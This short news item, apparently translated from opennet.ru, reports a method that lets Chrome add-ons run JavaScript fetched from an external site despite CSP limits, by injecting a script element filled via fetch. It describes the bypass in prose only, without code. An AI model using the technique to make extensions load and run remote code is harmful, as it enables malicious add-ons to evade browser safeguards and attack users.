a method that allows any Chrome add-on to execute external JavaScript code without giving the add-on extended permissions (without unsafe-eval and unsafe-inline in manifest.json). Access rights imply that without unsafe-eval, the add-on can only execute code included in the local distribution, but the proposed method makes it possible to bypass this restriction and execute any JavaScript loaded from an external site in the context of the add-on.
Google has closed public access to but in the archive sample code for exploiting the problem. Way method to bypass the script-src 'self' restriction in the CSP and boils down to substituting the script tag through document.createElement('script') and including external content in it through the fetch function, after which the code will be executed in the context of the add-on itself.
Source: opennet.ru